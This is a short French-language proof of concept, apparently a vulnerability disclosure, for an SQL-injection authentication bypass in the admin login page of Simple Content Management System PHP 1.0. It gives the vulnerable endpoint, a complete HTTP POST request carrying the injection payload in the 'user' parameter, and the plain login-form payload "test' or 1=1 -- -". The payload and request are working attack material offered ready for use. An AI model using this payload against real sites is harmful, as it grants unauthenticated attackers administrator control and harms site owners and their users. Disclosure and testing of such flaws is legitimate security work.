
Preuve de concept pour le contournement d'authentification par injection SQL dans Simple Content Management System PHP, permettant à des attaquants non authentifiés d'obtenir un accès administrateur via un paramètre utilisateur spécialement conçu.
Une vulnérabilité d'injection SQL existe dans la page de connexion administrateur du
système de gestion de contenu simple en PHP. Le paramètre user n'est pas
assaini avant d'être transmis à la requête SQL, ce qui permet à un
attaquant non authentifié de contourner l'authentification et d'obtenir un
accès administrateur complet.
/web/admin/login.phpusercode-projects.org
Système de gestion de contenu simple en PHP
1.0
POST /web/admin/login.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded
user=test'+or+1%3D1+--+-&password=test&submit=Login
ou ajoutez simplement ceci dans la page de connexion

test' or 1=1 -- -

Un attaquant distant non authentifié peut contourner complètement la connexion administrateur sans connaître aucun identifiant, obtenant un contrôle total sur le panneau d'administration, y compris l'ajout de contenu.
Imad Alvi